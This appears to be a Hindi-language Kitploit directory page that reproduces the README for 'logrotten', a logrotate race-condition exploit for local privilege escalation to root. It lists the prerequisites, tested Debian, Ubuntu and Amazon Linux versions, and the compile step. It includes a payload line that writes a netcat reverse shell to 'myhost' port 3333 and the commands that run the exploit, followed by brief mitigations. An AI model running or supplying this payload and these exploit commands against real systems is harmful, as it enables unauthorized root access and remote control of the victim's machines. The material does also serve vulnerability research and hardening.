Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
logrotten — Logrotate रेस कंडीशन एक्सप्लॉइट जो सिस्टम डायरेक्ट्रीज़ में रिवर्स शेल पेलोड जैसी आर्बिट्रेरी फ़ाइलें लिखकर प्रिविलेज एस्केलेशन सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/whotwagner/logrotten
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubwhotwagner/logrotten

logrotten

Logrotate रेस कंडीशन एक्सप्लॉइट जो सिस्टम डायरेक्ट्रीज़ में रिवर्स शेल पेलोड जैसी आर्बिट्रेरी फ़ाइलें लिखकर प्रिविलेज एस्केलेशन सक्षम बनाता है।

रिपॉजिटरी देखें
2112638 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

[!WARNING]
यह रिपॉजिटरी https://codeberg.org/whotwagner/logrotten पर स्थानांतरित कर दी गई है। नवीनतम अपडेट के लिए कृपया नए स्थान पर जाएँ।

लॉगरोटेट में रेस कंडीशन जीतकर विशेषाधिकार बढ़ाना

Logrotten Logo

संक्षिप्त विवरण

  • logrotate लॉगफ़ाइल का नाम बदलने के बाद रेस कंडीशन के प्रति संवेदनशील है।
  • यदि logrotate को root के रूप में निष्पादित किया जाता है, ऐसे विकल्प के साथ जो फ़ाइल बनाता है (जैसे create, copy, compress, आदि), और उपयोगकर्ता के पास लॉगफ़ाइल पथ का नियंत्रण है, तो किसी भी निर्देशिका में फ़ाइलें लिखने के लिए रेस-कंडीशन का दुरुपयोग करना संभव है।
  • एक हमलावर "/etc/bash_completition.d/" जैसी निर्देशिकाओं में रिवर्स-शेल लिखकर अपने विशेषाधिकार बढ़ा सकता है।

विशेषाधिकार बढ़ाने के लिए पूर्वापेक्षा

  • Logrotate को root के रूप में निष्पादित किया जाना चाहिए
  • लॉगपथ हमलावर के नियंत्रण में होना चाहिए
  • logrotate कॉन्फ़िगरेशन में फ़ाइलें बनाने वाला कोई भी विकल्प सेट होना चाहिए

परीक्षित संस्करण

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

संकलन

  • gcc -o logrotten logrotten.c

पेलोड तैयार करें

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

एक्सप्लॉइट चलाएँ

यदि logrotate.cfg में "create" विकल्प सेट है:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

यदि logrotate.cfg में "compress" विकल्प सेट है:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

ज्ञात समस्याएँ

  • docker कंटेनर या lvm2-वॉल्यूम के अंदर रेस जीतना कठिन था। logrotten का यह संस्करण विश्वसनीयता में सुधार करता है।

शमन

  • सुनिश्चित करें कि logpath का स्वामी root है
  • logrotate.cfg में "su" विकल्प का उपयोग करें
  • selinux या apparmor का उपयोग करें

लेखक

  • Wolfgang Hotwagner

संदर्भ

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
टूल डाउनलोड करें